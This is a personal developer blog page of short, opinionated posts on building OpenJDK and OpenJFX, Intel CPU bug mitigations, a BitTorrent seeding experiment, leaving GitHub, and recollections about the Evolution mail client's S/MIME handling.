Another shitty `technology' company
I have my previous workstation for work sitting idle so I thought
i'd drop in an xubuntu install and try building openjdk &
openjfx on it. It's got a 6x core I7-980 and plenty of RAM so it
should be ok right?
Well all went well until I tried to build webkit, just for
completeness. Result - consistent ICE inside g++. Blast. Well I
thought it was consistent until I tried it with a fresh build of
gcc 7.3, this also crashed but in a different place and when I
went back to the system gcc I noticed the crash whilst repeatable
wasn't in a consistent place. Actually it started crashing
everywhere, even inside various jvm based tasks.
This is typically a symptom of system problems, specifically RAM.
I looked in the BIOS incase it's been overclocked but it is so
ancient there's no settings for RAM, I ran a few memory testers, I
tried various numbers of threads for the build.
Then I remembered Intel and their notorious bugs this year causing
system stability problems in some cases. I tried to find the
options to turn off the bug mitigations but (in part due to isp
maintenance at just that moment) I gave up and just booted with
the 4.10.x kernel.
Oh look, works fine now (well, it compiles cleanly, webkit tests
Perhaps this is a failure of Canonical, or the Linux developers?
No, ultimately it's because Intel cut too many corners and have
shit hardware. Then again any company that could design something
as poor as HPET in this day and age is obviously fucking
On a related note i've been eyeing off a Ryzen system every few
months. I price one up and think about it but ultimately leave it
for the time being. I'm just not doing enough computing beyond
'read internet' to justify it. Another thing I can't decide on is
between some 'low-end' APU system or a beastly 2700X machine. The
RAM is still so $$$ here and you need good ram for either. At
least the last time I specced one up I noticed from some
benchmarks than a 2700X would pretty much cream that old I7-980 at
1/4 of the price (or less, not that I paid for it).
No nice things
So my experiment with bittorrent here has ended before it even
started. I was running transmission-daemon as the seeder - but
apart from a couple of short tests only had it running with no
torrents being seeded.
Despite that i'm getting 500MB+ traffic PER DAY! just from peer requests (I
guess, as there seems to be no way to find out what's going on
And the thing is I never publically released the torrent files it
was seeding so some port scraper has done it and added it to some
peer exchange. Despite blocking the port i'm still getting dozens
of incoming packets per minute but I guess they'll quieten down
Fortunately I don't pay for traffic.
Ahh google, the `great' advertising company!
Oh nice one, they've decided
all of Blender's videos on youtube because they don't want to
turn on advertising.
Essentially blackmailing them into becoming part of their slurping
adversiting empire where they get to make most of the money from
peoples labour whilst paying a pittance. Despite not being a real
user of it, as one of the original supporters who helped fund the
freeing of Blender way back when with a few hundred dollars I'm
pretty apalled they would be treated this way (although not
Fortunately the technology is coming together so that alternatives
exist to a monolithic/expensive server such
as PeerTube which uses
WebTorrent, or InterPlanetary File
System (IPFS), and others. blender.org is experimenting with
a peertube instance
Of course that only works so long as bittorrent isn't blocked, or
WebRTC isn't blocked, or backbone operators start to throttle
protocols competing with those that are part of their corporate
conglomerate or have not been paid for. Or regulatory capture
though some pro-establishment law effectively bans it (like the EU
Copyright `Article 13' crap happening now).
Even if some backlash makes them change their mind it's just
another example of the problem of corporate
centralisation/ownership of culture.
Free Software JavaFX
I've been keeping a (rather loose) eye out on the availability of
a fully free-software JavaFX for a while. Whilst all
distributions now ship OpenJDK by default and that works fine for
anything not JavaFX, the OpenJFX stuff has still been work in
progress and hasn't generally been available.
Anyway I thought i'd try to compile it myself. Of course the
first thing I noticed was that
a preview build IS now
available but I decided to keep going anyway so I could build
a complete integrated JDK/JRE rather than having to manually link
it in at runtime.
For the first part of the problem, following
instructions was quite straightforward, at least on Ubuntu
16.04. I manually installed a couple of the specific build tools
required and a couple of extra -dev packages. I didn't bother
with building the bundled webkit for now. Even on this gutless
under-RAM'd machine it didn't even take terribly long. I used
the openjdk 10 for the
Then I looked into integration witht the jdk (later section in the
build instructions). I was too lazy to read most of the build
instructions so I just went with configure && make, although after
a few iterations I settled on:
$ mkdir build
$ cd build
$ ../configure --with-import-modules=../../rt/build/modular-sdk \
$ make product-images
Some time later it's all done and I ran some simple tests and
Bob's your uncle. Stripping the debug symbols just reduces the
size of the install (significantly) although it's probably worth
keeping them at this early stage.
The slowest part was checking out the mecurial repositories.
Oh, I couldn't get the jdk tests to run :-/
just complained that it couldn't determine the JVM version.
Trying to search the interwebs has so far been fruitless - it's
not terribly important for now and I successfully ran
bootcycle-build which self-compiles after
bootstrapping which is at least some bit of testing.
Update: Not sure where I got it from but the jtreg I had
was out of date so it couldn't handle the new version string.
Starting on the jtreg
page got me the latest (4.2b12) and now the testing is
Although this box doesn't have much disk it does have enough for a
few big blobs so I thought I'd look into distributing a build
well!). To that end I sussed out setting up a private tracker
and seeding torrents directly from this machine.
Anyway i've mostly worked it out but it isn't quite ready but i'll
get to it eventually.
With the short lifetime of Java 9 and 10 i've basically just
ignored them completely - i'm still using 8.x everywhere. But
Java 11 is going to be LTS release so it's probably time to start
Having a fully free build of the whole platform is an important
part of that for my hobby code. Now I just need the motivation ...
Update 2: And NetBeans, which is still not supporting a Java
that was EOL'd 3 months ago. I'm sure they've nearly go the
licensing sorted out though!
Ok so I guess i'm a bit out of the loop (and search engines failed
me again, it took me hours to come across this stuff, mostly by
is going to removed from the JDK. And additionally the JRE
will also go away(?) and basically replaced with standalone
platform-specific builds via jlink. Actually i'm not sure how the
latter will work, maybe that's just wrt the openjdk; and in any
event Oracle are committing to another few years of Java 8 releases.
Given that all the 'action' is server-side I guess it makes some
sense. Just not for me!
Huh, I wonder why the current jdk build process allows linking in
the JavaFX module then. Unclear. Just doing so breaks the tests
so it's probably just the build system lagging slightly. Then
again the make_runargs.sh script used to run against the javafx
module doesn't seem to work against openjdk11 anyway. Well unless
there's some other meachanism but neither javafxpackager nor
javapackager get built - does jlink do all that now? So far my
searching has been pretty futile and a lot of the documentation is
either out of date or hard to find. I suppose it's still
basically work in progress and/or i'm just not that motivated to
dig deep enough.
Well I did waste the day anyway so whatever. At least AMD
announced some nice hardware and Intel made an arse of themselves
with their 'first' 5Ghz cpu demo which needed to be plugged into a
fridge to run for 10 seconds.
Oh, there is also openjfx in ubuntu repos, but it only goes to 8.
I can't remember if i looked at it in the past, probably did but I
think I was looking at java9 at the time not realising how short
lived it would be. I should've just stayed with 8.
Well I did find something about running against the standalone
this blog post. I guess all that javapackager stuff is gone
or something since webstart and applets are defunct? Not that I
ever used it anyway. Shrug.
and making a partial copy of the jre for every application will
be `easier' than just sending out a jar and having a central single
installation of a jre. Wot?
Everyone seems to be a bit upset that Oracle are only going to
provide commercial support for the oracle jdk11+ too - but given
how much they've invested in making the openjdk feature parity I
think they did ok for such an `evil' company. I mean, it's not
like they forked some public commons like Linux or something as
github and m$
I only had a couple of long abandoned projects on github but now
i've deleted my account. I don't see the immediate reason why m$
would want to buy it but it can't be for a good one for anyone else.
I wonder if they'd have bought if it git had the same meaning in
american as it does in english - i.e. bastard, fuckwit, etc.
But anyway I guess it's just as well I didn't move anything there
when google code shut down, saves me the hassle of doing it again.
Winter has hit here and along with insomnia i'm not really feeling
like doing much of an evening but i've dabbled a few times and
basically ported the Java version of a tree-revision database to
At this point i've just got the core done -
schema/bindings and most of the client api. I'm pretty sure it's
solid but I need to write a lot of testing and validation code to
make sure it will be reliable and performant enough, and then
write a bunch more to turn it into something interesting.
But i've been at a desk for 10 hours straight and my feet are icy
cold so it's not happening tonight.
Evolution and S/MIME
So I noticed there was a S/MIME security fault in a bunch of email
software - including Evolution.
Now my memory is a bit faded because it was 15+ years ago but I'm
pretty sure we wrote the code to handle this case (mostly Larry
and Jeff). For this each decoded segment was displayed separately
with a special gtkhtml tag to reset the html parser between
blocks. Although it might have only been on the signature level
so I could be wrong but in general it didn't just dump the whole
email to HTML for all sorts of reasons. The MIME parser could
handle all sorts of broken streams so truncated HTML was expected
to come up once in a while.
Of course that must've all been thrown away when the renderer was
replaced by the 'better' renderer from apple going by some of the
reports of the 'vulnerability'.
Not that i've ever used S/MIME or gpg - it's pretty much useless
to me since nobody I know knows how to use it and hardly anyone
uses email these days anyway.
I was also horrified to see that evolution now uses cmake. Well
just as well I completely ignored the project after I took a
voluntary redundancy ... I would've gone absolutely ballistic!
Not that compiling with libtool didn't suck complete arse but at
least it worked.
But GNOME was already going to shit back before I quit, both due
to redhat throwing their weight around and Miguel being such an
obnoxiously microsoft fanboi. Haven't touched it in any
meaningful way (or Evolution) in over a decade and all I see of it
is going backwards by continously copying the next shitty
GUI-trend-of-the-month and/or being bullied into shitty designs by
a bunch of fuckwits.
Had a bug in my fastcgi code, that broke the blog for some web
clients depending on their ID string. It just happened to break
on mobile phones more often. Oops.
Copyright (C) 2018 Michael Zucchi, All Rights Reserved.Powered by gcc & me!